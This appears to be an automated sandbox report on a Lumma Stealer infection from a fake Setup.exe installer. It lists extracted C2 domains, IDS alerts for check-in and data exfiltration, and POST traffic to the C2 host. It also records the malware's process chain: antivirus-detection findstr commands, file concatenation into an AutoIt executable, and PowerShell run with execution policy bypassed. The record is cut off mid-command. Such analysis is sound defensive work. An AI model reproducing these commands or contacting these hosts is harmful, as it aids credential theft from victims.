Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "chillysalvagk.click", "discokeyus.lat", "energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "rapeflowwj.lat", "necklacebudi.lat"], "Build id": "hRjzG3--VIKA"} |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: rapeflowwj.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: crosshuaht.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: sustainskelet.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: aspecteirs.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: energyaffai.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: necklacebudi.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: discokeyus.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: grannyejh.lat |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: chillysalvagk.click |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: lid=%s&j=%s&ver=4.0 |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: TeslaBrowser/5.5 |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: - Screen Resoluton: |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: - Physical Installed Memory: |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: Workgroup: - |
Source: 0000000B.00000003.2385121568.0000000003832000.00000004.00000800.00020000.00000000.sdmp |
String decryptor: hRjzG3--VIKA |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49747 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49753 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49759 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49765 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49771 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49777 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49783 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49789 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.5:49795 version: TLS 1.2 |
Source: C:\Users\user\Desktop\Setup.exe |
Code function: 0_2_00406301 FindFirstFileW,FindClose, |
0_2_00406301 |
Source: C:\Users\user\Desktop\Setup.exe |
Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, |
0_2_00406CC7 |
Source: C:\Windows\SysWOW64\cmd.exe |
File opened: C:\Users\user\AppData\Local\ |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
File opened: C:\Users\user\AppData\ |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
File opened: C:\Users\user\AppData\Local\Temp\203120 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
File opened: C:\Users\user\ |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
File opened: C:\Users\user\AppData\Local\Temp\ |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
File opened: C:\Users\user\AppData\Local\Temp\203120\ |
Jump to behavior |
Source: Network traffic |
Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49753 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49753 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49777 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49747 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49747 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49789 -> 104.21.42.70:443 |
Source: Malware configuration extractor |
URLs: grannyejh.lat |
Source: Malware configuration extractor |
URLs: chillysalvagk.click |
Source: Malware configuration extractor |
URLs: discokeyus.lat |
Source: Malware configuration extractor |
URLs: energyaffai.lat |
Source: Malware configuration extractor |
URLs: crosshuaht.lat |
Source: Malware configuration extractor |
URLs: aspecteirs.lat |
Source: Malware configuration extractor |
URLs: sustainskelet.lat |
Source: Malware configuration extractor |
URLs: rapeflowwj.lat |
Source: Malware configuration extractor |
URLs: necklacebudi.lat |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49753 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49765 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49795 -> 104.21.84.113:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49747 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49771 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49783 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49777 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49789 -> 104.21.42.70:443 |
Source: Network traffic |
Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49759 -> 104.21.42.70:443 |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VZV5VUXN60NGLK3R0MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12834Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GJT5SQY39MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15028Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7477TMBOG9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20518Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=59DVMLXIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1186Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WCQU1VUTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1070Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: chillysalvagk.click |
Source: global traffic |
HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop |
Source: Setup.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E |
Source: Setup.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0 |
Source: Setup.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0 |
Source: Setup.exe |
String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0 |
Source: Setup.exe |
String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0 |
Source: Setup.exe, Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G |
Source: Setup.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0 |
Source: Setup.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0 |
Source: Setup.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 |
Source: Setup.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: Setup.exe |
String found in binary or memory: http://ocsp.digicert.com0A |
Source: Setup.exe |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: Setup.exe |
String found in binary or memory: http://ocsp.digicert.com0X |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C |
Source: Setup.exe |
String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F |
Source: Setup.exe |
String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U |
Source: Setup.exe |
String found in binary or memory: http://ocsp.globalsign.com/rootr30; |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://ocsp2.globalsign.com/rootr306 |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://ocsp2.globalsign.com/rootr606 |
Source: powershell.exe, 0000000F.00000002.2595583078.0000000004E41000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Setup.exe |
String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08 |
Source: Setup.exe |
String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0? |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0 |
Source: Setup.exe |
String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06 |
Source: Sparc.com, 0000000B.00000000.2101885209.0000000000F15000.00000002.00000001.01000000.00000007.sdmp, Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: http://www.autoitscript.com/autoit3/X |
Source: powershell.exe, 0000000F.00000002.2595583078.0000000004E41000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lBjq |
Source: Democratic.0.dr, Sparc.com.2.dr |
String found in binary or memory: https://www.autoitscript.com/autoit3/ |
Source: powershell.exe, 0000000F.00000002.2595583078.00000000050BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594826170.0000000003050000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595040059.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595254668.000000000319A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595583078.00000000050BB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/5xx-error-landing |
Source: powershell.exe, 0000000F.00000002.2595583078.00000000051EB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ |
Source: powershell.exe, 0000000F.00000002.2595040059.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2597939647.0000000007591000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595481820.0000000003280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594826170.0000000003050000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2598146316.00000000075DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595254668.000000000319A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank |
Source: powershell.exe, 0000000F.00000002.2595040059.0000000003101000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/5xx-error-landingmance |
Source: powershell.exe, 0000000F.00000002.2595583078.00000000051EB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/learning/access-management/phish |
Source: powershell.exe, 0000000F.00000002.2595583078.00000000051EB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ |
Source: powershell.exe, 0000000F.00000002.2595583078.00000000051EB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX) |
Source: powershell.exe, 0000000F.00000002.2595583078.00000000050BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594826170.0000000003050000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595040059.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595254668.000000000319A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595583078.00000000050BB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/ |
Source: powershell.exe, 0000000F.00000002.2595040059.0000000003101000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack// |
Source: powershell.exe, 0000000F.00000002.2595040059.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2597939647.0000000007591000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595481820.0000000003280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594826170.0000000003050000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2595254668.000000000319A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c |
Source: Sparc.com.2.dr |
String found in binary or memory: https://www.globalsign.com/repository/0 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49777 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49765 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49783 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49753 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49795 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49783 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49771 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49789 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49765 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49795 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49777 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49759 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49759 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49753 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49771 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49789 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49747 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49753 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49759 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49765 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49771 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49777 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49783 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.42.70:443 -> 192.168.2.5:49789 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.5:49795 version: TLS 1.2 |
Source: C:\Users\user\Desktop\Setup.exe |
Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, |
0_2_004050F9 |
Source: C:\Users\user\Desktop\Setup.exe |
Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, |
0_2_004044D1 |
Source: C:\Users\user\Desktop\Setup.exe |
Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, |
0_2_004038AF |
Source: C:\Users\user\Desktop\Setup.exe |
Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, |
0_2_004044D1 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:748:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03 |
Source: C:\Windows\SysWOW64\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
Source: C:\Windows\SysWOW64\tasklist.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |
Source: unknown |
Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe" |
|
Source: C:\Users\user\Desktop\Setup.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Improvements Improvements.cmd & Improvements.cmd |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\tasklist.exe tasklist |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 203120 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cbs" Modems |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Treasury + ..\Laboratories + ..\Lifestyle + ..\Injured + ..\Papua + ..\Craps + ..\Arise W |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\203120\Sparc.com Sparc.com W |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 |
|
Source: C:\Users\user\AppData\Local\Temp\203120\Sparc.com |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> |